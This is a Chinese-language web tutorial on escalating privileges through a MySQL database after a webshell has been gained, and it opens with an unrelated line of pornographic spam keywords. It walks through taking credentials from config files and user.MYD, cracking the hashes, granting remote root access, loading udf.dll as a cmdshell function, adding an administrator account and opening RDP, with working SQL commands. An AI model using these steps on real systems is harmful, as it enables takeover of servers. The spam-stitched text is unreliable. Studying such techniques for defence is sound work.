亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

mysql數(shù)據(jù)庫提權(quán)的三種方法

 更新時(shí)間:2024年09月19日 10:22:10   作者:feing.  
文介紹了MySQL數(shù)據(jù)庫的三種提權(quán)方法:UDF提權(quán)、MOF提權(quán)和啟動(dòng)項(xiàng)提權(quán),同時(shí)列出了一些常見數(shù)據(jù)庫及其默認(rèn)端口,下面就來介紹一下,感興趣的可以了解一下

MySql提權(quán)的三種方式:

  • udf提權(quán)
  • mof提權(quán)
  • 啟動(dòng)項(xiàng)提權(quán)

以下是一些常見的數(shù)據(jù)庫及其默認(rèn)端口:

1. MySQL: 默認(rèn)端口為 3306

2. PostgreSQL: 默認(rèn)端口為 5432

3. Oracle Database: 默認(rèn)端口為 1521

4. Microsoft SQL Server: 默認(rèn)端口為 1433

5. MongoDB: 默認(rèn)端口為 27017

6. Redis: 默認(rèn)端口為 6379

7. Elasticsearch: 默認(rèn)端口為 9200 (HTTP) 和 9300 (內(nèi)部通信)

8. Cassandra: 默認(rèn)端口為 9042

9. SQLite: 通常是本地文件系統(tǒng),沒有固定端口

10. DB2: 默認(rèn)端口為 50000

11.國(guó)產(chǎn)的DM達(dá)夢(mèng)數(shù)據(jù)庫, 默認(rèn)端口號(hào)為:5236;

mysql_UDF 提權(quán):

拿到webshell之后,進(jìn)行數(shù)據(jù)庫提權(quán)操作

一、端口掃描

二、信息收集:

如何獲取mysql賬號(hào)密碼

1.查看網(wǎng)站配置文件。

如:conn、config、data、sql、common 、inc、include等。

2.Mysql配置文件:C:\phpStudy\MySQL\data\mysql\user.MYD

例如:DVWA默認(rèn)數(shù)據(jù)庫存儲(chǔ)在:C:/phpStudy/WWW/DVWA/config/config.inc.php.dist目錄

點(diǎn)擊查看:賬號(hào):root 密碼:root

查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

放到MD5在線網(wǎng)站進(jìn)行解密

三、提權(quán)利用

注意事項(xiàng):提權(quán)的第一步要知道數(shù)據(jù)庫的版本號(hào):

(1)如果mysql<5.1    導(dǎo)出目錄 c:\windows 或  c:\windows\system32

(2)mysql=>5.1   導(dǎo)出安裝目錄\MySQL\lib\plugin

注*:默認(rèn)mysql不能遠(yuǎn)程連接,需要用菜刀進(jìn)行本地連接

選擇mysql,填寫好賬號(hào):root 密碼root,確認(rèn)好提交進(jìn)行連接

設(shè)置遠(yuǎn)程連接,用于在本地連接。

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges; 重新加載權(quán)限數(shù)據(jù)

數(shù)據(jù)庫版本為5.5.53

由于本次實(shí)驗(yàn)數(shù)據(jù)庫為5.5.53,因此選擇\MySQL\lib\plugin目錄。

提示報(bào)錯(cuò)

前提條件為:secure_file_priv等于空,需要在my.ini配置文件中進(jìn)行設(shè)置

修改之后,查看安裝dll文件完成。

創(chuàng)建cmdshell函數(shù),執(zhí)行操作系統(tǒng)命令。

Create Function cmdshell returns string soname 'udf.dll';

使用cmdshll函數(shù)執(zhí)行操作系統(tǒng)命令

select cmdshell('whoami');
select cmdshell('net user 123 123/add');    添加用戶
select cmdshell('net localgroup administrators 123 /add');    將123用戶添加到管理組

開3389進(jìn)行遠(yuǎn)程連接

Create Function open3389 returns string soname 'udf.dll';
select open3389();    開啟3389遠(yuǎn)程連接

注意:僅用于技術(shù)討論,切勿用于其他用途,一切后果與本人無關(guān)。

到此這篇關(guān)于mysql數(shù)據(jù)庫提權(quán)的三種方法的文章就介紹到這了,更多相關(guān)mysql數(shù)據(jù)庫提權(quán)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評(píng)論